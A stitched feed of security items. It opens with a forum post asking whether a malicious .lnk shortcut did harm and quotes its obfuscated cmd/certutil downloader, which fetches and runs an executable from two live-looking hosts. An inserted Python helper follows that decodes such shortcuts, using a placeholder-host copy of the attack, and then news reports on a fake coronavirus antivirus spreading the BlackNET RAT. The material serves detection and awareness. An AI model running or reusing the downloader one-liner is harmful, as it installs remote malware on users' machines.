.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood that my double-clicking of a bad .lnk file caused damage. When I did double-click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or the shortcut was unavailable. I'm not finding anything in my startup folder for C:\programdata or my username's appdata startup folder... I ran scans with Malwarebytes and Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was: "%APPDATA%\Mic…
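Added example, not part of the post or of BleepingComputer's content: a small Python triage helper that expands the %VAR% and !VAR! references in a cmd.exe /v:on shortcut target of the kind quoted above and flags the behaviours a defender cares about (certutil as a downloader, a remote URL, a payload named after the user, suppressed output). The sample target is constructed to mirror the post's structure, with the download hosts replaced by the reserved placeholder attacker.example and a hypothetical victim environment.

```python
import re

# Constructed sample modelled on the shortcut target quoted in the post; the
# download hosts are replaced with the reserved placeholder attacker.example.
SAMPLE_LNK_TARGET = (
    r"%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179=gulches_%PROCESSOR_ARCHITECTURE% !H!"
    r'&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://'
    r"&IF NOT EXIST !H! (!V4adKK47!a.attacker.example!V4!||!V4adKK47!b.attacker.example!V4!"
    r"&!H!))>nul 2>&1"
)
SAMPLE_ENV = {"PROCESSOR_ARCHITECTURE": "AMD64", "USERNAME": "victim"}  # hypothetical victim
PERCENT = re.compile(r"%([A-Za-z0-9_]+)%")           # %VAR%: expanded when the line is parsed
DELAYED = re.compile(r"!([A-Za-z0-9_]+)!")           # !VAR!: delayed expansion, enabled by /v:on
SET_CMD = re.compile(r"^set\s+([^=]+)=(.*)$", re.I)  # SET NAME=VALUE, split at the first '='
# Command separators (&, &&, ||) and grouping parentheses, only when outside double quotes.
SEPARATOR = re.compile(r'(?:&&|\|\||[&|()])(?=(?:[^"]*"[^"]*")*[^"]*$)')
INDICATORS = {
    "certutil used as a downloader": re.compile(r"\bcertutil\b.*-urlcache", re.I),
    "remote URL in command line": re.compile(r"https?://\S+", re.I),
}

def decode_lnk_target(target, env):
    """Return (resolved_commands, findings) for a cmd.exe /v:on one-liner.
    Grouping and IF conditions are flattened (every command that may run is listed)
    and cmd's exact expansion timing is ignored: a !VAR! that is not yet defined is
    retried on later commands so that the intended chain becomes visible."""
    start = re.search(r"/c\b", target, re.I)
    if "/v:on" not in target.lower() or not start:
        return [], ["not a cmd /v:on delayed-expansion one-liner"]
    body = re.sub(r"\s*>\s*nul(\s+2>&1)?\s*$", "", target[start.end():], flags=re.I)
    body = PERCENT.sub(lambda m: env.get(m.group(1), m.group(0)), body)
    local, resolved = {}, []
    for seg in (s.strip() for s in SEPARATOR.split(body) if s.strip()):
        m = SET_CMD.match(seg)
        if m:                                    # remember the variable for later commands
            local[m.group(1).strip().upper()] = m.group(2)
            continue
        for _ in range(8):                       # bounded fixpoint expansion of !VAR!
            seg, prev = DELAYED.sub(lambda x: local.get(x.group(1).upper(), x.group(0)), seg), seg
            if seg == prev:
                break
        resolved.append(seg)
    findings = ["delayed-expansion (!VAR!) obfuscation"] if DELAYED.search(target) else []
    for cmd in resolved:
        findings += [n for n, rx in INDICATORS.items() if rx.search(cmd) and n not in findings]
        if cmd.strip('"').lower() == (env.get("USERNAME", "") + ".exe").lower():
            findings.append("runs a file named after the current user")
    if re.search(r">\s*nul\s+2>&1", target, re.I):
        findings.append("all output suppressed (>nul 2>&1)")
    return resolved, findings
```

The resolved list shows the effective chain (the guarded certutil fetch of a file named after the user, then its execution), which is what to hunt for in Sysmon or EDR telemetry rather than the obfuscated shortcut text itself.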

MALWAREBYTES done tech number# MALWAREBYTES B customer.care suppM - Patch.com

Posted: 23 Mar 2020 12:51 AM PDT

Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer

Posted: 23 Mar 2020 04:12 PM PDT

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former has already been taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active, although its contents have been altered: the malicious links were removed and a donation link was added to support the scammers' efforts (spoiler alert: no donations have been made so far).

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app."

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone were to fall for this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their system if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable of detecting whether it is being analyzed within a VM, and it checks for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel

The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).

Fake antivirus site promises coronavirus protection, delivers trojan - ComputerWeekly.com

Posted: 24 Mar 2020 09:04 AM PDT

A fraudulent website that claims to offer a digital antivirus program that protects users against the Covid-19 coronavirus has been found online, tricking its victims into downloading a remote access trojan, or Rat, that turns the target computer into a bot.

The site in question is just one of a number of scam websites that have been newly identified by Malwarebytes, and more are popping up all the time, as cyber criminals try out any means to cash in on what is becoming, by some margin, one of the most dangerous and widespread cyber security threats in history.

"Scammers and malware authors are taking advantage of the coronavirus crisis in full swing. We have seen a number of spam campaigns using Covid-19 as a lure to trick people into installing a variety of malware, but especially data stealers," said the Malwarebytes threat intelligence team in a blog post disclosing its latest research.

"As more of us work from home, the need to secure your computer, especially if you are connecting to your company's network, becomes more important. However, you should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point."

It should go without saying that no cyber security antivirus product could possibly provide protection against an actual biological virus. However, those responsible for the scam – to which we are not linking – have almost certainly already ensnared numerous victims and will be counting on stressed and emotional people being more likely to fall for the trick.

Fake website offering protection against the coronavirus

The website (pictured) states: "Our scientists from Harvard University have been working on a special AI development to combat the virus using a windows app. Your PC actively protects you against the Coronaviruses (Cov) while the app is running."

If a user is unfortunate enough to install the application, they will find themselves infected by the BlackNET Rat, giving cyber criminals the ability to access the target machine from a command and control (C2) server.

BlackNET enables cyber criminals to co-opt the target machine into a botnet to conduct distributed denial of service (DDoS) attacks, to take screenshots, to steal Firefox cookies, to steal saved passwords, to implement a keylogger, to remotely execute other malicious scripts, and to steal bitcoin wallets if present. Malwarebytes said the full source code for this particular toolkit has been circulating on GitHub for at least a month.

"Users should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point"
Malwarebytes threat intelligence team

In this instance, Malwarebytes was able to work with CloudFlare, whose service was being abused to deliver the malicious website. CloudFlare has now taken action to flag the website as a phishing scam.

"During this period, it is important to stay safe both at home and online. The number of scams we have seen during these past few weeks shows that criminals will take advantage of any situation, no matter how dire it is," the researchers said.

"We recommend that you keep your computer up to date and use extra caution when downloading new programs. Beware of instant notifications and other messages, even if they appear to come from friends."

More information, including further screengrabs and indicators of compromise (IoCs), can be found on the Malwarebytes website.
